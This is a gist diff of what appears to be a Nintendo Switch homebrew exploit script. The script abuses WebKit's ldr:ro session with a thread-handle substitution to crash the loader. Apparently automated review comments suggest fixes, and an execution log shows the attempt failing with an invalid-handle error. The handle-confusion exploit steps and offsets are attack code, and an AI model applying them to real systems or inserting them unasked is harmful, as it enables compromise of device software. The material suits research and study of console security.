@roblabla
Forked from anonymous/gist:e22ca4ffa7d0dd44a44ed97aec96ad88
Created February 23, 2018 20:01
diff --git a/usefulscripts/dumpModules.js b/usefulscripts/dumpModules.js
index a382369..d0edbdf 100644
--- a/usefulscripts/dumpModules.js
+++ b/usefulscripts/dumpModules.js
@@ -67,7 +67,7 @@ function dumpModule(module, loader, name) {
utils.log("stage1, getting webkit ldr:ro handle");
//We are reusing WebKit's ldr:ro session
-var ldrro_mng_ptr = utils.add2(sc.mainaddr, 0x955558);
+var ldrro_mng_ptr = utils.add2(sc.mainaddr, 0x95D1E8);
//utils.log('ldr:ro management str base ptr is: ' + utils.paddr(ldrro_mng_ptr));
var ldrro_mng = sc.read8(ldrro_mng_ptr);
//utils.log('ldr:ro management str base is: ' + utils.paddr(ldrro_mng));
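Review bot: The new constant 0x95D1E8 at `ldrro_mng_ptr` is a build-specific offset into WebKit's main image, and neither the old nor the new value records which firmware/WebKit build it was taken from, so the next person to bump it has nothing to compare against. I would annotate it in place, e.g. `// ldr:ro session object in WebKit main; 0x955558 on the previous target build, 0x95D1E8 on the build this gist targets (fill in version)`. The pointer read on the next line is also used as-is, so on a build where the offset is wrong `sc.read8` returns garbage that only surfaces later at the IPC layer; a cheap guard such as `if (!ldrro_mng) throw new Error("ldr:ro management ptr read as null, offset is wrong for this build");` would fail loudly at stage 1 instead. The attached log shows stage 2 connecting, so the new value appears correct for the build it was run on, but that cannot be confirmed from the hunk alone. dumpModule, which this hunk belongs to, starts and ends outside the hunk.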
@@ -85,15 +85,16 @@ var nroSize = 0x1000;
var bssSize = 0x900;
//We initialize with a Thread Handle, 0xffff8000 instead of current process handle, 0xffff8001
-sc.ipcMsg(4).datau64(0).sendPid().copyHandle(0xffff8000).sendTo(ldrro);
+sc.ipcMsg(4).datau64(0).sendPid().copyHandle(0xffff8000).showPacked().sendTo(ldrro).assertOk();
//We setup a fake nrr loading sequence
-sc.ipcMsg(2).datau64(0, nrrbase, nrrSize).sendPid().sendTo(ldrro);
+utils.log(" Trying loadnrr");
+sc.ipcMsg(2).datau64(0, nrrbase, nrrSize).sendPid().showPacked().sendTo(ldrro).assertOk();
utils.log("stage3, crashing ldr:ro");
//Just calling a normal cmd0 will crash since it will call svcMapProcessCodeMemory during LoadNro sequence using a
//thread handle, attempting a process handle. This happens because svcGetProcessInfo in ldr:ro initialize can also take up
//a Thread Handle as an argument, while svcMapProcessCodeMemory will bug out on it
-var res =sc.ipcMsg(0).datau64(0, nrobase, nroSize, utils.add2(nrobase, nroSize), bssSize).sendPid().sendTo(ldrro);
+var res =sc.ipcMsg(0).datau64(0, nrobase, nroSize, utils.add2(nrobase, nroSize), bssSize).sendPid().showPacked().sendTo(ldrro).assertOk();
//Those are useless so better free them now
sc.free(nrobase);
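Review bot: The `.assertOk()` added to the LoadNrr call on line 31 now aborts the whole sequence before stage 3 is ever reached, and the attached log shows exactly that: cmd 2 returns 0xe401 (Invalid handle, module Kernel) and the stack trace ends in assertOk, while the cmd 4 Initialize with the 0xffff8000 thread handle on line 27 passed. That is consistent with the thread-handle substitution being rejected already when ldr:ro handles the NRR rather than surviving until the LoadNro crash the comment on lines 33-35 relies on, but ldr:ro's internals are not visible here, so treat that as an inference. If the intent is to proceed regardless and observe what LoadNro does, I would not assert on that call but capture and log its result, `var nrrRes = sc.ipcMsg(2).datau64(0, nrrbase, nrrSize).sendPid().showPacked().sendTo(ldrro);` followed by `utils.log("loadnrr result: " + nrrRes);` (exact formatting depends on what sendTo returns), and update the stage 3 comment to state the result actually observed. The hunk header announces 15/16 lines but only 12/13 are shown, so the tail of this hunk and the rest of the enclosing dumpModule are cut off.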
stage1, getting webkit ldr:ro handle
stage2, connecting to ldr:ro
ipcm+0x0 | 04 00 00 00 0a 00 00 80 03 00 00 00 00 00 00 00 | ................ |
ipcm+0x10 | 00 00 00 00 00 80 ff ff 00 00 00 00 00 00 00 00 | ................ |
ipcm+0x20 | 53 46 43 49 00 00 00 00 04 00 00 00 00 00 00 00 | SFCI............ |
ipcm+0x30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ |
Trying loadnrr
ipcm+0x0 | 04 00 00 00 0e 00 00 80 01 00 00 00 00 00 00 00 | ................ |
ipcm+0x10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ |
ipcm+0x20 | 53 46 43 49 00 00 00 00 02 00 00 00 00 00 00 00 | SFCI............ |
ipcm+0x30 | 00 00 00 00 00 00 00 00 00 40 53 23 0b 00 00 00 | .........@S#.... |
ipcm+0x40 | 00 10 00 00 00 00 00 00 00 00 00 00 | ............ |
IPC message:
- Command ID / Result code: Error: 0xe401 (Invalid handle. in module Kernel)
ERR [826]: 0xe401 (Invalid handle. in module Kernel)
ResultCode@exploit/ResultCode.js:15:0
assertOk@exploit/ipc.js:555:0
eval code